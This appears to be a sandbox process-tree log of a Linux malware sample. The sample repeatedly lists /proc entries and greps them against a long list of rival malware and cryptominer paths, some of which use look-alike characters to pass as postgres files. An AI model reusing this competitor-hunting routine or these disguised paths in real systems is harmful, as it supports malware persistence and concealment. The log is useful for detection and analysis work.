/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:835
-
-
/bin/grepgrep exe2⤵PID:838
-
-
/bin/lsls -latrh /proc/2072⤵PID:837
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:840
-
-
/bin/grepgrep exe2⤵PID:843
-
-
/bin/lsls -latrh /proc/212⤵PID:842
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:845
-
-
/bin/grepgrep exe2⤵PID:848
-
-
/bin/lsls -latrh /proc/222⤵PID:847
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:850
-
-
/bin/lsls -latrh /proc/232⤵PID:852
-
-
/bin/grepgrep exe2⤵PID:853
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:855
-
-
/bin/lsls -latrh /proc/242⤵PID:857
-
-
/bin/grepgrep exe2⤵PID:858
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:860
-
-
/bin/grepgrep exe2⤵PID:863
-
-
/bin/lsls -latrh /proc/2402⤵PID:862
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:865
-
-
/bin/lsls -latrh /proc/32⤵PID:867
-
-
/bin/grepgrep exe2⤵PID:868
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:870
-
-
/bin/grepgrep exe2⤵PID:873
-
-
/bin/lsls -latrh /proc/3282⤵PID:872
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:875
-
-
/bin/lsls -latrh /proc/3292⤵PID:877
-
-
/bin/grepgrep exe2⤵PID:878
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:880
-
-
/bin/grepgrep exe2⤵PID:883
-
-
/bin/lsls -latrh /proc/3332⤵PID:882
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:885
-
-
/bin/grepgrep exe2⤵PID:888
-
-
/bin/lsls -latrh /proc/3572⤵PID:887
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:890
-
-
/bin/lsls -latrh /proc/3582⤵PID:892
-
-
/bin/grepgrep exe2⤵PID:893
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:895
-
-
/bin/grepgrep exe2⤵PID:898
-
-
/bin/lsls -latrh /proc/362⤵PID:897
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:900
-
-
/bin/grepgrep exe2⤵PID:903
-
-
/bin/lsls -latrh /proc/372⤵PID:902
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:905
-
-
/bin/grepgrep exe2⤵PID:908
-
-
/bin/lsls -latrh /proc/3742⤵PID:907
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:910
-
-
/bin/lsls -latrh /proc/3752⤵PID:912
-
-
/bin/grepgrep exe2⤵PID:913
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:915
-
-
/bin/grepgrep exe2⤵PID:918
-
-
/bin/lsls -latrh /proc/3822⤵PID:917
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:920
-
-
/bin/grepgrep exe2⤵PID:923
-
-
/bin/lsls -latrh /proc/42⤵PID:922
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:925
-
-
/bin/lsls -latrh /proc/4272⤵PID:927
-
-
/bin/grepgrep exe2⤵PID:928
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:930
-
-
/bin/grepgrep exe2⤵PID:934
-
-
/bin/lsls -latrh /proc/52⤵PID:933
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:937
-
-
/bin/grepgrep exe2⤵PID:940
-
-
/bin/lsls -latrh /proc/62⤵PID:939
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:943
-
-
/bin/grepgrep exe2⤵PID:947
-
-
/bin/lsls -latrh /proc/6682⤵PID:946
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:950
-
-
/bin/grepgrep exe2⤵PID:954
-
-
/bin/lsls -latrh /proc/6712⤵PID:953
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:956
-
-
/bin/lsls -latrh /proc/6762⤵PID:959
-
-
/bin/grepgrep exe2⤵PID:960
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:963
-
-
/bin/grepgrep exe2⤵PID:966
-
-
/bin/lsls -latrh /proc/6772⤵PID:965
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:970
-
-
/bin/grepgrep exe2⤵PID:973
-
-
/bin/lsls -latrh /proc/6842⤵PID:972
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:976
-
-
/bin/grepgrep exe2⤵PID:980
-
-
/bin/lsls -latrh /proc/6982⤵PID:979
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:983
-
-
/bin/grepgrep exe2⤵PID:987
-
-
/bin/lsls -latrh /proc/6992⤵PID:986
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:989
-
-
/bin/lsls -latrh /proc/72⤵PID:992
-
-
/bin/grepgrep exe2⤵PID:993
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:996
-
-
/bin/grepgrep exe2⤵PID:999
-
-
/bin/lsls -latrh /proc/702⤵PID:998
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1003
-
-
/bin/grepgrep exe2⤵PID:1006
-
-
/bin/lsls -latrh /proc/7032⤵PID:1005
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1009
-
-
/bin/grepgrep exe2⤵PID:1013
-
-
/bin/lsls -latrh /proc/7042⤵PID:1012
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1015
-
-
/bin/grepgrep exe2⤵PID:1019
-
-
/bin/lsls -latrh /proc/7052⤵PID:1018
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1022
-
-
/bin/grepgrep exe2⤵PID:1026
-
-
/bin/lsls -latrh /proc/7062⤵PID:1025
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1029
-
-
/bin/grepgrep exe2⤵PID:1032
-
-
/bin/lsls -latrh /proc/712⤵PID:1031
-
-
